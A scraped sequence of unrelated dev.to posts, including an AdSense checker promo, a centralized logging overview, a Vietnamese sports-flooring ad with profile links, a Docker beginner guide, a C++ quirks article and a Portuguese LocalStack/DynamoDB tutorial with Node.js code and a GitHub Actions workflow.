website for you! ### Why Use It? - **Domain Age and Quality**: The tool checks if your domain meets the age and quality requirements, saving you the pain of guesswork. - **Scores**: You need a score of 70% or more to be in the safe zone. Anything less and you need to go back to the drawing board. - **Comprehensive Scanning**: It scans for all the important criteria: Domain Age, Domain Authority, Page Authority, Backlinks, Indexed Pages, and more. ### How to Use It? 1. **Step 1**: Enter your website URL. 2. **Step 2**: Click 'Check'. 3. **Step 3**: Get your score and a detailed breakdown of areas that need improvement. It’s pretty much like having that brutally honest friend who tells you when your outfit looks bad—only, this one actually helps! ## Quick Tips for Fast Approval ### 1. **Optimize Your Content** Ensure your content is well-written, grammatically pristine, and useful. No keyword stuffing. Google's AI has evolved—it now thinks! ### 2. **Improve Website Navigation** A cluttered website is like a messy room. Make sure your website’s layout is easy to navigate. ### 3. **Engage In Social Media** Promote your content on social media platforms. It not only boosts traffic but also signals Google that your content is worth looking at. ### 4. **Quality Backlinks** Focus on getting backlinks from reputable sites. A nod from an established website goes a long way. ### 5. **Consistent Updates** Update your website regularly. Stale content is a big no-no for Google. ## Final Words Getting Google AdSense approval is no walk in the park, but with [Adsense Eligibility Checker](https://webmatrices.com/adsense-eligibility-checker), it’s certainly not Mt. Everest either. Use the tool as your personal guide to fix what needs fixing, and you’ll be raking in those ad dollars before you know it. Remember, patience and consistency are key. Now, go forth and conquer the AdSense world! --- Optimize your website with this guide, and who knows? In no time, you might just make enough from ads to finally buy that llama farm you've always wanted. 🌟
developerbishwas
1,912,164
Create diagram By Write Text
A post by friday
0
2024-07-05T03:07:20
https://dev.to/fridaymeng/create-diagram-by-write-text-35p1
<iframe width="560" height="315" src="https://www.youtube.com/embed/38zN0qMgHRw?si=wtIdPeA8Khoi3BAT" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
fridaymeng
1,912,163
Centralized Logging and Monitoring for Spring Boot and React Applications
Centralized Logging and Monitoring for Spring Boot and React Applications Modern web...
0
2024-07-05T03:04:23
https://dev.to/virajlakshitha/centralized-logging-and-monitoring-for-spring-boot-and-react-applications-1loa
![usecase_content](https://cdn-images-1.medium.com/proxy/1*zqfBK-ivKOyE5TLv4mHkkA.png) # Centralized Logging and Monitoring for Spring Boot and React Applications Modern web applications, often built on microservice architectures with components like Spring Boot for the backend and React for the frontend, require robust logging and monitoring solutions. Centralized logging and monitoring are essential for maintaining application health, troubleshooting issues, and gaining insights into performance bottlenecks. This blog post will discuss the importance and challenges of centralized logging and monitoring, delve into various use cases, explore different implementation approaches, and compare available tools and services. ### Understanding Centralized Logging and Monitoring Centralized logging and monitoring involve collecting, aggregating, and analyzing log data and performance metrics from various parts of your application, including: * **Application Logs:** Detailed messages generated by the Spring Boot backend, encompassing information about API requests, database interactions, exceptions, and custom debug messages. * **Web Server Logs:** Access logs from your web server (e.g., Nginx, Apache) capturing details about each HTTP request handled. * **Frontend Logs:** Events and error messages from your React frontend, providing insights into user interactions, JavaScript errors, and network requests. * **Infrastructure Metrics:** System-level metrics like CPU usage, memory consumption, disk I/O, and network traffic from the underlying infrastructure hosting your application. ### The Why: Use Cases for Centralized Logging and Monitoring Let's explore specific scenarios where centralized logging and monitoring are invaluable: **1. Rapid Incident Response and Root Cause Analysis:** Imagine a critical API endpoint experiencing a sudden surge in errors. Centralized logging allows you to quickly correlate error logs from your Spring Boot backend with corresponding web server access logs. This correlation can pinpoint the source of the issue – whether it's due to a code bug, a spike in traffic, or an external dependency failure. **2. Performance Optimization and Bottleneck Identification:** By monitoring key performance indicators (KPIs) such as API response times, database query durations, and frontend rendering times, you can identify bottlenecks in your application. For example, slow database queries revealed through centralized monitoring might lead you to optimize a database index or refactor a query for better performance. **3. Security Auditing and Threat Detection:** Centralized logs serve as an audit trail for security-related events. By analyzing access logs and application logs, you can detect suspicious activity like unauthorized login attempts, data breaches, or injection attacks. Real-time monitoring of these logs allows for immediate alerts and quicker responses to potential security threats. **4. Capacity Planning and Resource Optimization:** Historical data on resource utilization – CPU, memory, network – are crucial for capacity planning. By analyzing trends in log data and metrics, you can predict future resource needs, optimize resource allocation, and prevent performance degradation due to insufficient resources. **5. User Behavior Analysis and Application Improvement:** Frontend logs capturing user interactions can be analyzed to understand user behavior patterns, identify popular features, and uncover usability issues. These insights are essential for making data-driven decisions regarding feature prioritization and UX/UI improvements in your React application. ### Implementation Approaches **1. ELK Stack (Elasticsearch, Logstash, Kibana):** A popular open-source stack. Logstash collects and processes logs from various sources, Elasticsearch provides fast and scalable log storage and indexing, and Kibana offers a powerful interface for data visualization and analysis. **2. Splunk:** A commercial log management and analysis platform known for its real-time data ingestion, robust search capabilities, and comprehensive dashboards for monitoring. **3. AWS CloudWatch:** Amazon's managed service for log collection, storage, analysis, and monitoring. Seamless integration with other AWS services makes it a suitable choice for applications hosted on AWS. **4. Azure Monitor:** Microsoft's cloud monitoring service providing a centralized platform to collect, analyze, and act on telemetry from your applications and Azure resources. **5. Datadog:** A cloud-based monitoring platform offering real-time insights into your applications, infrastructure, and network. It's known for its extensive integrations and customizable dashboards. ### Comparing Options | Feature | ELK Stack | Splunk | AWS CloudWatch | Azure Monitor | Datadog | |----------------|-----------|---------|---------------|---------------|---------| | Type | Open-source | Commercial | Managed Service | Managed Service | Commercial | | Scalability | High | High | High | High | High | | Cost | Variable (infrastructure) | Subscription-based | Pay-as-you-go | Pay-as-you-go | Subscription-based | | Learning Curve| Steep | Moderate | Moderate | Moderate | Moderate | ### Conclusion Centralized logging and monitoring are no longer optional for modern applications. They are essential for ensuring application health, troubleshooting issues proactively, and making data-driven decisions. Carefully evaluate the different approaches and tools discussed to select the best fit for your application's specific needs and your organization's technical expertise and budget. ### Advanced Use Case: Real-time Anomaly Detection and Automated Remediation (Software Architect/AWS Solution Architect Perspective) Let's consider a more advanced use case where we combine the power of centralized logging and monitoring with machine learning for proactive anomaly detection and automated remediation. **Scenario:** We have a Spring Boot microservice handling financial transactions. Maintaining the integrity and availability of this service is paramount. **Architecture:** * **Spring Boot Application:** Instrumented to emit detailed metrics and logs to Amazon CloudWatch Logs. * **AWS CloudWatch Logs:** Collects and aggregates logs from the application. * **AWS Kinesis Data Firehose:** Streams real-time log data from CloudWatch Logs. * **AWS Lambda:** Processes the log stream, performing real-time anomaly detection using a pre-trained machine learning model (e.g., an anomaly detection algorithm in Amazon SageMaker). * **AWS SNS (Simple Notification Service):** Sends alerts to operations teams upon detection of anomalies. * **AWS Lambda (Remediation):** Triggered by SNS alerts, executes automated remediation actions – for instance, scaling up the application or isolating a faulty instance. **Benefits:** * **Proactive Issue Mitigation:** By identifying anomalies in real time, we can proactively address potential problems before they impact end-users. * **Reduced Mean Time to Resolution (MTTR):** Automated remediation significantly reduces the time it takes to recover from failures, enhancing application availability. * **Data-Driven Insights:** The machine learning model continuously learns from historical data, improving anomaly detection accuracy over time. This advanced use case demonstrates how centralized logging and monitoring, when combined with other powerful cloud services and machine learning, can enable organizations to build highly resilient and self-healing applications.
virajlakshitha
1,912,162
Hãng thảm sàn thể thao Enlio
Enlio là thương hiệu hàng đầu thế giới về sản xuất thảm sàn thể thao, đặc biệt là thảm cầu lông. Với...
0
2024-07-05T03:02:57
https://dev.to/enliovietnamox/hang-tham-san-the-thao-enlio-o8c
Enlio là thương hiệu hàng đầu thế giới về sản xuất thảm sàn thể thao, đặc biệt là thảm cầu lông. Với uy tín và chất lượng đã được kiểm chứng qua việc tài trợ và cung cấp thảm cho nhiều giải đấu cầu lông quốc tế lớn, Enlio khẳng định vị thế là đối tác tin cậy của các vận động viên và tổ chức thể thao chuyên nghiệp. Thảm bóng rổ Y-65170X được thiết kế đặc biệt để đáp ứng các tiêu chuẩn khắt khe về độ nảy, độ ma sát và độ bền, đảm bảo trải nghiệm thi đấu tốt nhất cho người chơi. Được thiết kế màu gỗ lắp đặt được trong nhà. Xuất xứ từ Trung Quôc cùng thông số kỹ thuật như sau: Quy cách: Cuộn 1.8x15m Bảo hành: 5 năm Chiều dày: 7.0 mm Bên cạnh đó, Enlio còn cung cấp đa dạng các loại thảm sàn thể thao khác như bóng rổ, bóng chuyền, tennis,... đáp ứng nhu cầu đa dạng của thị trường. Với công nghệ sản xuất tiên tiến và vật liệu chất lượng cao, Enlio cam kết mang đến những sản phẩm thảm sàn thể thao an toàn, thân thiện với môi trường và có tuổi thọ cao. Thương hiệu không ngừng nỗ lực cải tiến và phát triển để đáp ứng nhu cầu ngày càng cao của khách hàng, đồng thời đóng góp vào sự phát triển của ngành thể thao thế giới. Website https://enlio.vn/tham-bong-chuyen-enlio-y-46170 Website: https://enlio.vn/tham-bong-chuyen-enlio-y-46170 Phone: 0983269911 Address: 127 Hoàng Văn Thái, Thành Phố Hải Dương, Tỉnh Hải Dương https://manylink.co/@enliovietnamyl https://willysforsale.com/profile/enliovietnamib https://jsfiddle.net/user/enliovietnamjp https://www.shippingexplorer.net/en/user/enliovietnamjx/108252 https://lab.quickbox.io/enliovietnamvl https://telegra.ph/enliovietnam-07-05 https://www.slideserve.com/enliovietnamhx https://dutrai.com/members/enliovietnamee.27708/#about https://www.credly.com/users/hang-th-m-san-th-thao-enlio.42d48b59/badges https://www.ameba.jp/profile/general/enliovietnamfb/?account_block_token=3FFRKovBIq16UGmprcrbjaba1Tk6IuNK https://tvchrist.ning.com/profile/HangthamsanthethaoEnlio662 https://hub.docker.com/u/enliovietnammp https://boersen.oeh-salzburg.at/author/enliovietnamon/ http://buildolution.com/UserProfile/tabid/131/userId/410317/Default.aspx https://turkish.ava360.com/user/enliovietnamzd/# https://dlive.tv/enliovietnamcj https://dev.to/enliovietnamox https://club.doctissimo.fr/enliovietnamsq/ https://www.silverstripe.org/ForumMemberProfile/show/159409 https://expathealthseoul.com/profile/hang-thảm-san-thể-thao-enlio-668761656e935/ https://www.giveawayoftheday.com/forums/profile/199512 https://wirtube.de/a/enliovietnambp/video-channels https://participez.nouvelle-aquitaine.fr/profiles/enliovietnam_15/activity?locale=en https://www.naucmese.cz/hang-tham-san-the-thao-enlio-6?_fid=bjfn
enliovietnamox
1,912,161
Team Building 101: Communication & Innovation | Paul Lewis from Pythian 🎙️
In this episode, host Kovid Batra is joined by Paul Lewis, a seasoned technology leader with over 30...
0
2024-07-05T03:01:26
https://dev.to/grocto/team-building-101-communication-innovation-paul-lewis-from-pythian-4bem
webdev, forem, podcast, career
In this episode, host Kovid Batra is joined by Paul Lewis, a seasoned technology leader with over 30 years of experience. Paul has held prominent roles, including CTO at Hitachi Vantara, and currently serves as CTO at Pythian. In addition to his professional roles, Paul actively contributes to academia as a board member of the Schulich School of Business. In today’s episode, Paul shares his insights on building tech teams from scratch, offering valuable perspectives from his vast experience in the technology sector. 💡 Highlights a) Getting Candid 👨🏻‍💻 Paul’s introduction 🌈 Witnessing a spectrum of technology b) Professional Journey 💼 Switching from IT to OT at Hitachi Vantara 🚀 Innovation & future tech at Pythian c) Key Takeaways 💟 Establishing a collaborative team culture ✅ Hiring & talent acquisition strategy 💬 Processes & communication in growing teams 🤖 Aligning tech innovation with business requirements Full Podcast - [https://grocto.substack.com/p/ep-44-team-building-101-communication]
grocto
1,912,159
Introduction to Docker: A Beginner's Guide
In today's fast-paced software development world, deploying applications quickly and reliably is...
0
2024-07-05T02:58:01
https://dev.to/mahendraputra21/introduction-to-docker-a-beginners-guide-1d9i
docker, container, devops, dockerfile
In today's fast-paced software development world, deploying applications quickly and reliably is crucial. Docker, a powerful tool, helps developers achieve this by enabling the creation, deployment, and running of applications in containers. This guide will introduce you to Docker, explaining its core concepts and how it can benefit your development process. --- ![docker images](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2uuhdy7h7p3st4vjo7xf.png) ## What is Docker? Docker is a platform designed to simplify the process of developing, shipping, and running applications. It uses containerization technology, which allows you to package an application and its dependencies into a standardized unit called a container. Containers are lightweight, portable, and can run consistently across different environments, from development to production. ## Why Use Docker? Docker offers several advantages for developers and organizations: 1. **Consistency:** Containers ensure that an application runs the same way, regardless of where it is deployed. This consistency eliminates the "it works on my machine" problem. 2. **Isolation:** Each container runs in its own isolated environment, which means that dependencies and configurations do not interfere with one another. 3. **Scalability:** Docker makes it easy to scale applications by adding or removing containers as needed. 4. **Portability:** Containers can run on any system that supports Docker, making it easy to move applications between different environments. ## Core Concepts of Docker To get started with Docker, it's essential to understand its core concepts: **1. Images** A Docker image is a lightweight, standalone, and executable software package that includes everything needed to run a piece of software, including the code, runtime, libraries, and dependencies. Images are created from a set of instructions written in a `Dockerfile`. Example of a simple Dockerfile: ``` # Use an official Python runtime as a parent image FROM python:3.8-slim # Set the working directory in the container WORKDIR /app # Copy the current directory contents into the container at /app COPY . /app # Install any needed packages specified in requirements.txt RUN pip install --no-cache-dir -r requirements.txt # Make port 80 available to the world outside this container EXPOSE 80 # Run app.py when the container launches CMD ["python", "app.py"] ``` **2. Containers** A container is a runtime instance of a Docker image. When you run a Docker image, it becomes a container. Containers can be started, stopped, moved, and deleted. Each container is an isolated environment, which makes it ideal for running applications without affecting the host system. **3. Docker Hub** Docker Hub is a cloud-based repository where Docker users can find and share container images. It hosts official images for popular software and user-contributed images. You can pull images from Docker Hub and use them in your projects. Example of pulling an image from Docker Hub: `docker pull nginx` ## Getting Started with Docker To start using Docker, follow these simple steps: 1. **Install Docker:** Download and install Docker Desktop from the [official Docker website](https://www.docker.com/). 2. **Run a Container:** Open a terminal and run your first container using a simple command: ``` docker run hello-world ``` This command pulls the `hello-world` image from Docker Hub, creates a container, and runs it. 3. **Create a Dockerfile:** Write a `Dockerfile `for your application to define how the image should be built. 4. **Build an Image:** Use the `docker build` command to create an image from your `Dockerfile`: ``` docker build -t my-app . ``` 5. **Run Your Container:** Use the `docker run` command to start a container from your image: ``` docker run -p 4000:80 my-app ``` This command maps port 4000 on your host to port 80 in the container, making your application accessible at `http://localhost:4000`. --- ## Conclusion Docker is a powerful tool that can streamline your development and deployment process by providing a consistent, isolated, and portable environment for your applications. By understanding its core concepts and following the basic steps to get started, you can leverage Docker to improve your workflow and deliver software more efficiently.
mahendraputra21
1,912,158
The Quirky Side of C++: Weird Stuff That Makes Us Love (and Hate) It
Welcome, fellow coders, to a whimsical journey through the quirks and oddities of C++. While C++ is...
0
2024-07-05T02:51:43
https://dev.to/subham_behera/the-quirky-side-of-c-weird-stuff-that-makes-us-love-and-hate-it-4k31
cpp, programming, learning, coding
Welcome, fellow coders, to a whimsical journey through the quirks and oddities of C++. While C++ is celebrated for its power and flexibility, it also comes with a host of peculiarities that can surprise even seasoned developers. Let's dive into some of the weird and wonderful aspects of C++ that make it the charming (and sometimes infuriating) language it is. --- #### 1. The Infamous "Most Vexing Parse" One of the most notorious oddities in C++ is the "most vexing parse," a term coined by Scott Meyers. This quirk can turn what looks like an innocuous declaration into something entirely unexpected. ```cpp std::vector<int> v(std::vector<int>::size_type(10), 20); ``` You might think this creates a vector with 10 elements, each initialized to 20. But no, it actually declares a function named `v` that returns a `std::vector<int>` and takes a parameter of type `std::vector<int>::size_type` and another parameter of type `int`. To avoid this, use uniform initialization (a.k.a. brace initialization): ```cpp std::vector<int> v{10, 20}; ``` --- #### 2. Default Arguments in Function Templates Default arguments in function templates can lead to some baffling behaviour. Consider this example: ```cpp template<typename T> void foo(T t = 10) { std::cout << t << std::endl; } int main() { foo(); // Error: no matching function for call to 'foo()' } ``` Even though `10` is a valid default argument for an `int`, the compiler doesn't know `T` is `int` until it's explicitly told. A workaround is to use an overloaded function: ```cpp void foo(int t = 10) { std::cout << t << std::endl; } template<typename T> void foo(T t) { std::cout << t << std::endl; } int main() { foo(); // Works! } ``` --- #### 3. The Magic of SFINAE SFINAE (Substitution Failure Is Not An Error) is a cornerstone of C++ template metaprogramming, allowing for complex template logic. However, it can be quite perplexing at first glance. ```cpp template<typename T> auto test(int) -> decltype(std::declval<T>().foo(), std::true_type{}); template<typename T> std::false_type test(...); struct HasFoo { void foo() {} }; int main() { std::cout << decltype(test<HasFoo>(0))::value << std::endl; // Prints 1 (true) std::cout << decltype(test<int>(0))::value << std::endl; // Prints 0 (false) } ``` The SFINAE magic here checks if a type `T` has a member function `foo` and sets the return type accordingly. It's a powerful feature, but can lead to head-scratching moments. --- #### 4. The Curious Case of `std::vector<bool>` `std::vector<bool>` is a special case in the C++ Standard Library. Unlike other `std::vector` specializations, it doesn't store `bool` values directly. Instead, it uses a bit-field-like structure to save space, leading to unexpected behaviour. ```cpp std::vector<bool> vb = {true, false, true}; vb[0] = false; std::cout << std::boolalpha << vb[0] << std::endl; // Prints false ``` The non-standard representation can cause performance issues and surprising side effects. If you need a true `std::vector` of boolean-like values, consider using `std::vector<char>` or `std::vector<int>` instead. --- #### 5. The Hidden Cost of Copy Elision Copy elision is an optimization technique where the compiler omits unnecessary copy and move operations. However, this can lead to some unexpected scenarios. ```cpp struct Widget { Widget() { std::cout << "Widget()" << std::endl; } Widget(const Widget&) { std::cout << "Widget(const Widget&)" << std::endl; } Widget(Widget&&) { std::cout << "Widget(Widget&&)" << std::endl; } }; Widget createWidget() { return Widget(); } int main() { Widget w = createWidget(); } ``` With copy elision, the compiler might optimize away the copy and move constructors, making it seem like they are never called, even though they exist. --- #### 6. The Enigma of Name Hiding Name hiding can cause some truly baffling behaviour. If a derived class declares a member with the same name as one in the base class, it hides all base class members with that name, even if the signatures are different. ```cpp struct Base { void f(int) { std::cout << "Base::f(int)" << std::endl; } }; struct Derived : Base { void f(double) { std::cout << "Derived::f(double)" << std::endl; } }; int main() { Derived d; d.f(10); // Error: no matching function for call to 'Derived::f(int)' } ``` To avoid this, bring the base class function into scope using `using`: ```cpp struct Derived : Base { using Base::f; void f(double) { std::cout << "Derived::f(double)" << std::endl; } }; int main() { Derived d; d.f(10); // Prints "Base::f(int)" d.f(10.0); // Prints "Derived::f(double)" } ``` --- #### Conclusion C++ is a language full of quirks and intricacies that can be both fascinating and frustrating. These weird aspects are part of what makes C++ so powerful and versatile, yet they also highlight the importance of understanding the language deeply. Embrace the quirks, and you'll find C++ to be an endlessly rewarding language. --- Feel free to share your own C++ oddities and experiences in the comments below. Happy coding! ---
subham_behera
1,912,156
Caso de uso: LocalStack
Um pouco sobre o LocalStack O LocalStack é um emulador de serviços AWS que abrange seus...
0
2024-07-05T02:46:39
https://dev.to/joserafaelsh/caso-de-uso-localstack-3gc5
aws, docker, githubactions, node
## Um pouco sobre o LocalStack O **LocalStack** é um emulador de serviços **AWS** que abrange seus principais serviços, alguns de forma gratuita e outros não. O objetivo dessa ferramenta é facilitar o desenvolvimento de aplicações que utilizam serviços da **AWS**, aumentando a segurança em relação a custos de desenvolvimento, melhorando a experiência do desenvolvedor em relação a problemas de configurações de permissões com o **IAM** e permitindo a existência de um ambiente de testes, visando tanto a parte de aprendizado e experimentação dos serviços da **AWS**, quanto processos como **CI** com integrações com o Github Actions. O **LocalStack** também possui integrações com outras ferramentas incríveis como **Pulumi**, **Serverless**, **Terraform** e **Testcontainers**. Leia mais sobre: [https://docs.localstack.cloud/getting-started/](https://docs.localstack.cloud/getting-started/) ## O cenário Suponha uma aplicação simples que realiza todas as operações de um **CRUD** utilizando uma tabela no **DynamoDB**. Independentemente da forma com que o desenvolvedor vai construir essa aplicação, cedo ou tarde ele vai ter que acessar a tabela de produção para validar o que foi feito, seja com testes manuais que todos nós fazemos ou com **testes de integração** e **e2e**, e é aí que o problema começa a aparecer. ## O problema O **DynamoDB** cobra por operações na tabela, ou seja, antes de realmente finalizar e disponibilizar a aplicação, já vão ter sido gerados custos. Adicione um pouco mais de complexidade nesse sistema, integrando um processamento assíncrono com **SQS**, eventos com **EventBridge** e notificações com **SNS** e **SES**, e pronto, sua fatura da AWS já vai estar rodando antes do dia 0 da sua aplicação. ## A solução Nesse cenário, podemos utilizar em nosso ambiente de desenvolvimento o **LocalStack**, um emulador de serviços cloud **AWS** que tem como objetivo agilizar e simplificar o desenvolvimento e testes de aplicações que utilizem serviços da cloud **AWS**. Utilizando o **Docker**, **docker-compose** e **AWS SDK** da linguagem de programação utilizada, conseguimos subir um container do **LocalStack** e, através da configuração de **URL** do **SDK** e de **variáveis de ambiente**, conseguimos manipular os ambientes para que, em desenvolvimento e testes, as chamadas apontem para o **LocalStack,** minimizando os custos durante o desenvolvimento. No caso apresentado acima, conseguiríamos executá-lo totalmente dentro do **LocalStack** utilizando os serviços do **DynamoDB** e os serviços extras como **SQS**, **EventBridge**, **SNS** e **SES** (de forma simulada). Isso garantiria um **custo zero** de serviços cloud durante o desenvolvimento e em **pipelines** de **CI/CD**, uma vez que o **LocalStack** também possui integração com **GitHub Actions**. ## Implementação Afim de exemplificar o uso e, embasado na aplicação apresentada acima, implementei parcialmente um **CRUD** simples de produtos com apenas duas operações: criar um item e ler todos os itens da tabela. A implementação foi feita utilizando apenas recursos do Node 22, inclusive seu próprio test runner. A aplicação é uma API normal com duas rotas: uma para criar um item e outra para ler todos os itens de uma tabela do **DynamoDB**. Para configurar meu ambiente de desenvolvimento, utilizei um arquivo **.env** para guardar minhas variáveis de acesso e **endpoint** da **AWS**. Esse arquivo será utilizado para que possamos alterar de forma rápida, sem ter que de fato abrir o código, o ambiente em que nossa aplicação vai rodar. ```tsx NODE_ENV="dev" PORT=3000 AWS_ENDPOINT=http://localhost:4566 AWS_REGION=us-east-1 AWS_ACCESS_KEY_ID=fake_id AWS_SECRET_ACCESS_KEY=fake_secret ITEMS_TABLE_NAME="items_table" ``` **Também foi utilizado o LocalStack com Docker e docker-compose.** ```tsx services: localstack: container_name: "localstack" image: localstack/localstack ports: - "127.0.0.1:4566:4566" # LocalStack Gateway - "127.0.0.1:4510-4559:4510-4559" # external services port range volumes: - "/var/run/docker.sock:/var/run/docker.sock" #required for some services - ./setup.sh:/etc/localstack/init/ready.d/start-localstack.sh ``` **No docker-compose, é importante ressaltar o último volume utilizado. Ele é um script .sh que será copiado para dentro do container do LocalStack e será executado junto com a inicialização do container. Esse arquivo contém o comando para criar uma tabela no DynamoDB.** ```tsx #!/bin/bash awslocal dynamodb create-table --table-name items_table --key-schema AttributeName=id,KeyType=HASH --attribute-definitions AttributeName=id,AttributeType=S --billing-mode PAY_PER_REQUEST --region us-east-1 ``` Todos os comandos para lidar com os serviços da **AWS** no **LocalStack** podem ser encontrados na documentação da ferramenta. Com o container rodando e o arquivo **.env** configurado, o próximo passo é configurar via código o cliente do serviço que será utilizado. Nesse caso, o serviço será o **DynamoDBClient**. **Vale ressaltar que foi utilizado o SDK v3 para o NodeJs.** O **DynamoDBClient** recebe como parâmetro as seguintes configurações: ```jsx const awsConfig = { endpoint: process.env.AWS_ENDPOINT, region: process.env.AWS_REGION, credentials: { accessKeyId: process.env.AWS_ACCESS_KEY_ID, secretAccessKey: process.env.AWS_SECRET_ACCESS_KEY, }, }; ``` Como passamos toda a nossa configuração via variáveis de ambiente, não precisamos alterar nenhuma parte do código para trocar entre nosso ambiente de desenvolvimento e o ambiente de produção. A configuração do cliente do **DynamoDB** da nossa aplicação ficou da seguinte forma: ```jsx import { CreateTableCommand, DeleteTableCommand, DynamoDBClient, PutItemCommand, ScanCommand, } from "@aws-sdk/client-dynamodb"; import { PutCommand } from "@aws-sdk/lib-dynamodb"; const awsConfig = { endpoint: process.env.AWS_ENDPOINT, region: process.env.AWS_REGION, credentials: { accessKeyId: process.env.AWS_ACCESS_KEY_ID, secretAccessKey: process.env.AWS_SECRET_ACCESS_KEY, }, }; const dynamoClient = new DynamoDBClient(awsConfig); export const Dynamo = { getAllItems: (tableName) => { return dynamoClient.send( new ScanCommand({ TableName: tableName, }) ); }, createItem: (item, tableName) => { return dynamoClient.send( new PutCommand({ TableName: tableName, Item: { ...item, }, }) ); }, createTable: (tableName) => { return dynamoClient.send( new CreateTableCommand({ TableName: tableName, KeySchema: [ { AttributeName: "id", KeyType: "HASH", }, ], AttributeDefinitions: [ { AttributeName: "id", AttributeType: "S", }, ], ProvisionedThroughput: { ReadCapacityUnits: 1, WriteCapacityUnits: 1, }, }) ); }, deleteTable: (tableName) => { return dynamoClient.send( new DeleteTableCommand({ TableName: tableName, }) ); }, }; ``` Como um dos intuitos do **LocalStack** é permitir o teste local de serviços **AWS**, criei uma rotina simples de teste, apenas para garantir que conseguimos executar as duas operações que a nossa aplicação se propõe a fazer. ```jsx import { describe, it } from "node:test"; import { Dynamo } from "../dynamo-db.js"; import assert from "node:assert/strict"; describe("Integrations tests with DynamoDB and LocalStack", () => { const database = Dynamo; const testTableName = "items_table_test"; it("it should create the items table", async () => { const response = await database.createTable(testTableName); const status = response["$metadata"].httpStatusCode; assert.equal(response != undefined, true); assert.equal(status, 200); }); it("it should create a item", async () => { const response = await database.createItem( { id: "123", name: "teste", price: 100, }, testTableName ); const status = response["$metadata"].httpStatusCode; assert.equal(response != undefined, true); assert.equal(status, 200); }); it("it should get all items", async () => { const response = await database.getAllItems(testTableName); const status = response["$metadata"].httpStatusCode; assert.equal(response != undefined, true); assert.equal(status, 200); assert.equal(response.Count > 0, true); assert.equal(response.ScannedCount > 0, true); assert.equal(response.Items.length > 0, true); }); it("it should delete the items table", async () => { const response = await database.deleteTable(testTableName); assert.equal(response != undefined, true); }); }); ``` **Ao final do desenvolvimento, criei uma action no GitHub para que possamos rodar nossos testes em um pipeline de CI/CD.** ```jsx name: CI using localstack on: push jobs: continuos-integration: runs-on: ubuntu-latest environment: poc-node-js-localstack-env steps: - uses: actions/checkout@v3 - name: Using Node.js uses: actions/setup-node@v2 with: node-version: 22. - name: Start LocalStack uses: LocalStack/[email protected] with: image-tag: 'latest' install-awslocal: 'true' - name: Create .env file run: | touch .env echo "AWS_ACCESS_KEY_ID=${{vars.AWS_ACCESS_KEY_ID}}" >> .env echo "AWS_ENDPOINT=${{vars.AWS_ENDPOINT}}" >> .env echo "AWS_REGION=${{vars.AWS_REGION}}" >> .env echo "AWS_SECRET_ACCESS_KEY=${{vars.AWS_SECRET_ACCESS_KEY}}" >> .env echo "ITEMS_TABLE_NAME=${{vars.ITEMS_TABLE_NAME}}" >> .env cat .env - name: run install, build and test run: | npm install npm run test ``` Aqui está o link para mais informações sobre a integração do **LocalStack** com **GitHub Actions**: [https://docs.localstack.cloud/user-guide/ci/github-actions/](https://docs.localstack.cloud/user-guide/ci/github-actions/) .Esse recurso pode ajudar a configurar **pipelines** de **CI/CD** que utilizam o **LocalStack** para testes locais de serviços **AWS**. ## Limitações Nem todos os serviços que podem ser emulados via **LocalStack** estão inteiramente implementados e estáveis. Pegando o **DynamoDB** e o **SES**, podemos notar que a maioria das funcionalidades do **DynamoDB** estão implementadas parcialmente e, para o SES, a maioria de seus serviços estão instáveis. Com isso, podemos concluir que precisamos nos atentar aos serviços e suas funcionalidades para que não haja divergências bruscas entre nosso ambiente de desenvolvimento, testes e o de produção. Na documentação do **LocalStack**, podemos encontrar todos os serviços e seus respectivos níveis de cobertura. ## Alguns exemplos - docker-compose ```docker services: localstack: container_name: "localstack" image: localstack/localstack ports: - "127.0.0.1:4566:4566" # LocalStack Gateway - "127.0.0.1:4510-4559:4510-4559" # external services port range volumes: - "/var/run/docker.sock:/var/run/docker.sock" #required for some services ``` - NodeJS DynamoDB example ```jsx import { DynamoDBClient } from "@aws-sdk/client-dynamodb"; const dynamodbConfig = { region: "us-east-1", }; const isLocal = IS_OFFLINE === "true"; if (isLocal) { const host = LOCALSTACK_HOST || "localhost"; dynamodbConfig["endpoint"] = `http://${host}:4566`; } const client = new DynamoDBClient(dynamodbConfig); ``` - NodeJS SQS NestJS example ```tsx @Injectable() export class SqsService { private readonly client: SQSClient = new SQSClient({ endpoint: this.envConfigService.getAwsEndpoint() || process.env.AWS_ENDPOINT, region: this.envConfigService.getAwsRegion(), credentials: { accessKeyId: this.envConfigService.getAwsAccessKeyId(), secretAccessKey: this.envConfigService.getAwsSecretAccessKey(), }, }); constructor() {} } ``` ```tsx NODE_ENV=prod AWS_ENDPOINT=protocol://service-code.region-code.amazonaws.com AWS_REGION=us-east-1 AWS_ACCESS_KEY_ID=real_id AWS_SECRET_ACCESS_KEY=real_secret ``` ```tsx NODE_ENV=dev AWS_ENDPOINT=http://localhost:4566 AWS_REGION=us-east-1 AWS_ACCESS_KEY_ID=fake_id AWS_SECRET_ACCESS_KEY=fake_secret ``` O **endpoint** é formado pelo seguinte padrão: “protocol://service-code.region-code.amazonaws.com”. Um exemplo de **endpoint** é “https://dynamodb.us-west-2.amazonaws.com”. Para o ambiente de desenvolvimento, o endpoint vai apontar para a porta que está rodando o container do LocalStack. Vale ressaltar que as chaves e IDs de acesso podem ser simplesmente um “teste” para rodar de forma local. ## Recursos extras - Serviços disponivéis: [localstack-services](https://docs.localstack.cloud/user-guide/aws/feature-coverage/) - Lista de AWS SDKs: [AWS-SDKs](https://aws.amazon.com/developer/tools/) - Docker: [Docker](https://docs.docker.com/engine/install/ubuntu/) - LocalStack GitHub: [localstack-github](https://github.com/localstack/localstack) - Aws Endpoints: [aws-endpoint-config](https://docs.aws.amazon.com/general/latest/gr/rande.html) - Exemplo de uso: [localstack-test-erick-wendel](https://www.youtube.com/watch?v=rwyhw9UYHkA) - Repo com código desenvolvido: [joserafaelSH/poc-node-js-localstack](https://github.com/joserafaelSH/poc-node-js-localstack)
joserafaelsh
1,912,155
How to use IP2Location.io and IP2WHOIS in Flask?
Introduction Flask is a Python micro web framework that does not rely on any particular...
0
2024-07-05T02:44:33
https://dev.to/ip2location/how-to-use-ip2locationio-and-ip2whois-in-flask-59lk
webdev, programming, python, developers
